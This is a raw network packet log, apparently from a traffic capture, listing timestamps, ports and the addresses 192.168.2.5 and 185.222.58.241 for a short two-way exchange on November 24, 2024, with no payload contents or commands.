Nov 24, 2024 20:12:14.491780996 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.573915005 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.573940992 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.573980093 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.573981047 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.573992968 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.574007034 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.574007988 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.574024916 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.574052095 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.574218988 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.574230909 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.574261904 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.574266911 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.574285030 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.574299097 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.574345112 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.613358974 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.613400936 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.613476992 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.696290970 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.696321011 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.696332932 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.696373940 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.696376085 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.696419001 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.696449995 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.696453094 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.696466923 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.696480989 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.696494102 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.696531057 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.696542025 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.696573973 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.696602106 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.696603060 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.696618080 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.696655989 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.737426043 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.737478971 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.737517118 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.822597027 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.822629929 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.822663069 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.822696924 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.822714090 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.822715044 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.822761059 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.822762012 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.822808027 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.822844982 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.822890997 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.822894096 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.822921991 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.822953939 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.822969913 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.823044062 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.863739014 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.863780975 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.863795996 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.863828897 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.863831997 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.863879919 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.863882065 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.863929033 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.946538925 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.946569920 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.946599007 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.946625948 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.946655989 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.946655989 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.946676970 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.946703911 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.946703911 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.946727991 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.946734905 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.946748972 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.946866989 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.946894884 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.946918964 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.946942091 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.984075069 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.984231949 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.984261036 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:14.984312057 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:14.984332085 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.065943956 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.065958977 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.066051960 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.066063881 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.066163063 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.066188097 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.066200018 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.066231012 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.066267014 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.066302061 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.066317081 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.066353083 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.066437960 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.103780985 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.103794098 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.103914976 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.103926897 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.104039907 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.185513973 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.185528040 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.185667992 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.185678959 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.185718060 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.185741901 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.185781002 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.185801983 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.185838938 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.185866117 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.185925961 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.185940981 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.185967922 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.186048985 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.223211050 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.223227024 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.223264933 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.223277092 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.223288059 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.223336935 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.223395109 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.309906006 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.309925079 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.309968948 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.309981108 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.310012102 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.310059071 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.310059071 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.310090065 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.310101986 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.310193062 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.310256004 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.310296059 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.310329914 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.310372114 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.310419083 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.312709093 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.347203016 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.347217083 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.347269058 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.347281933 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.347297907 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.347338915 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.347383976 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.347383976 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.436083078 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.436099052 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.436126947 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.436140060 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.436167002 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.436177969 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.436178923 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.436191082 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.436208010 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.436213017 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.436219931 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.436266899 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.436266899 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.436348915 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.470506907 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.470546961 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.470562935 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.470578909 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.470591068 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.470643997 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.470644951 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.470680952 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.470698118 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.470805883 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.557887077 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.557900906 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.557951927 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.557988882 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.558000088 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.558036089 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.558104038 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.558149099 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.558156967 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.558181047 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.558235884 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.558248997 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.558298111 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.558370113 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.589519024 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.589533091 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.589806080 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.592818975 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.592832088 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.592907906 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.592907906 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.592981100 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.592997074 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.593013048 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.593100071 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.593166113 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.683464050 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.683485985 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.683499098 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.683511019 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.683556080 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.683564901 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.683588982 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.683624983 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.683636904 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.683645010 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.683645010 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.683672905 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.683679104 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.683811903 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.716903925 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.717024088 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.719358921 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.719420910 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.719451904 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.719460964 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.719474077 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.719527006 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.719549894 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.719562054 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.719599962 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.719700098 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.809633970 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.809648991 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.809676886 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.809689999 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.809726954 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.809731007 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.809756994 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.809798956 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.809799910 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.809827089 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.809844017 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.809885979 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.810100079 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.842732906 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.842773914 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.842839956 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.842940092 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.845088959 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.845102072 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.845168114 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.845191956 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.845215082 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.845257044 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.845292091 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.845474005 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.965152025 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.965176105 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.965209007 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.965220928 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.965233088 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.965260983 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.965289116 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.965313911 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.965373039 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.965400934 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.965415001 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.965441942 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.965455055 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.965466976 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.965476036 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.965477943 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.965490103 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.965516090 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.965516090 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.965542078 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.965553999 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.965564966 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:15.965579987 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.965593100 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:15.965648890 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.085191011 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.085241079 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.085272074 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.085278988 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.085299969 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.085300922 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.085324049 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.085326910 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.085352898 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.085355043 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.085374117 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.085385084 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.085395098 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.085412025 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.085431099 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.085438967 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.085457087 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.085465908 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.085489988 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.085493088 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.085517883 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.085520029 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.085531950 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.085537910 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.085561991 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.085572004 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.085591078 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.085618019 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.085647106 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.085668087 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.085694075 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.085694075 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.085722923 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.085763931 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.170974970 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.171030998 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.171044111 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.171072960 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.171089888 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.171118975 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.171143055 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.171194077 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.171196938 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.171221018 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.171237946 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.171272039 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.171274900 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.171298981 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.171344042 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.171360016 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.171411037 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.202244997 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.202275038 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.202332973 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.204483986 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.204535007 CET	49711	55615	192.168.2.5	185.222.58.241
Nov 24, 2024 20:12:16.204771042 CET	55615	49711	185.222.58.241	192.168.2.5
Nov 24, 2024 20:12:16.204798937 CET	55615	49711	185.222.58.241	192.168.2.5
